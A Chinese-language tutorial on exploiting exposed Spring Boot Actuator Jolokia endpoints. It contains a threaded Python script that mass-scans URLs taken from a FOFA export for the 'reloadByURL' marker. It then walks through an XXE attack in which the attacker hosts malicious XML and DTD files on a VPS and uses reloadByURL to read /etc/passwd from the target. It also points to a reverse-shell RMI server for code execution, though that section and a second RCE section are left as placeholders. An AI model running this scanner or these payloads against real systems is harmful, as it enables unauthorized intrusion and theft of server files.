Spring Boot Actuator 漏洞利用
漏洞检测:
目标 Spring 应用存在路径 /jolokia/list,
并且返回的 JSON 中包含 “reloadByURL”
关于路径问题:1.x 版本在根路径下注册路由,2.x 版本则需要加 /actuator/ 前缀。(防护角度:2.x 默认只对外暴露 health/info 端点,jolokia 端点需显式引入并开启,应限制其访问。)
写个批量脚本检测一下
import threading
import argparse
import requests
import queue
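def readfile(path='fofa_spring.txt'):
    """Load target base URLs from *path* into the shared queue ``q``.

    Each non-empty line is stripped and prefixed with ``http://`` when it
    does not already start with ``http`` (so ``https://`` entries pass
    through unchanged). Blank lines are skipped instead of being queued
    as a bare ``http://``. ``q`` is the module-level ``queue.Queue``
    created in ``__main__``; this must run before the worker threads start.

    Args:
        path: text file with one host or URL per line. Defaults to the
            file name the script originally hard-coded.
    """
    with open(path, 'r', encoding='utf-8') as f:
        for line in f:
            target = line.strip()
            if not target:
                continue  # a blank line would otherwise become 'http://'
            if not target.startswith('http'):
                target = 'http://' + target
            q.put(target)
    print('文件加载完毕!!!\n')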
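def writefile(p, path='sucess.txt'):
    """Append the confirmed URL *p* as one line to the results file *path*.

    Args:
        p: the full URL that answered with the Jolokia MBean list.
        path: results file; defaults to the historically misspelled
            'sucess.txt' so existing workflows keep finding their output.
    """
    with open(path, 'a', encoding='utf-8') as f:
        f.write(p + '\n')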
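def check():
    """Pop one base URL from the shared queue and probe both Jolokia paths.

    Reads the module-level ``q``, ``url`` and ``url2`` set in ``__main__``.
    A host is reported as a hit when either ``<base>/jolokia/list`` (1.x
    layout) or ``<base>/actuator/jolokia/list`` (2.x layout) answers 200
    with a body containing ``reloadByURL``; the matching URL is echoed and
    appended via ``writefile``. Uses ``get_nowait`` so a worker that races
    another thread for the last item returns instead of blocking forever
    on an empty queue.
    """
    try:
        c = q.get_nowait()
    except queue.Empty:
        return
    try:
        for path in (url, url2):
            r = requests.get(c + path, timeout=0.5)
            if r.status_code == 200 and 'reloadByURL' in r.text:
                # report the path that actually answered (the original
                # reported /jolokia/list even for the /actuator/ hit)
                print('\033[1;31;40m[+]Yes: \033[0m' + c + path)
                writefile(c + path)
                break
        else:
            print('[-]NO: ' + c)
    except requests.RequestException:
        # connection/timeout errors are routine in a scan: record them as
        # unreachable rather than silently dropping the host
        print('[!]ERR: ' + c)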
def batch():
    """Worker loop: keep calling ``check`` until the shared queue ``q`` reports empty."""
    # iter(callable, sentinel) re-evaluates q.empty() before every step and
    # stops as soon as it returns True -- same loop as `while not q.empty()`.
    for _ in iter(q.empty, True):
        check()
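if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='*********Spring Boot Actuator*********')
    group = parser.add_mutually_exclusive_group()
    # help text now names the files the code actually uses
    # (readfile: fofa_spring.txt, writefile: sucess.txt)
    group.add_argument("-b", "--batch", action="store_true",
                       help='批量检测当前目录fofa_spring.txt中的url,命中的写入sucess.txt')
    args = parser.parse_args()
    # Shared state read by readfile()/check()/batch(): the work queue and the
    # two candidate paths (1.x registers /jolokia at the root, 2.x under /actuator).
    q = queue.Queue()
    url = '/jolokia/list'
    url2 = '/actuator/jolokia/list'
    if args.batch:
        readfile()
        workers = [threading.Thread(target=batch) for _ in range(10)]  # 10 threads
        for t in workers:
            t.start()
        for t in workers:
            t.join()  # exit only after the last worker has drained the queue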
XXE
在 VPS 上启动 Web 服务:
python3 -m http.server 80
在 VPS 上放入文件 fire.xml 和 fire.dtd
fire.xml
<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE a [ <!ENTITY % remote SYSTEM "http://vps-ip/fire.dtd">%remote;%int;]>
<a>&trick;</a>
fire.dtd
<!ENTITY % d SYSTEM "file:///etc/passwd">
<!ENTITY % int "<!ENTITY trick SYSTEM ':%d;'>">
访问目标网站:
target-ip/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/vps-ip!/fire.xml
成功读取到文件内容
reloadByURL RCE
reloadByURL 远程加载 xml,xml 中指定恶意的 RMI 服务
下载这个 zip 到 VPS 解压,修改里面的 EvilRMIServer.java 文件中反弹 shell 的地址。
pass…
createJNDIRealm RCE
pass…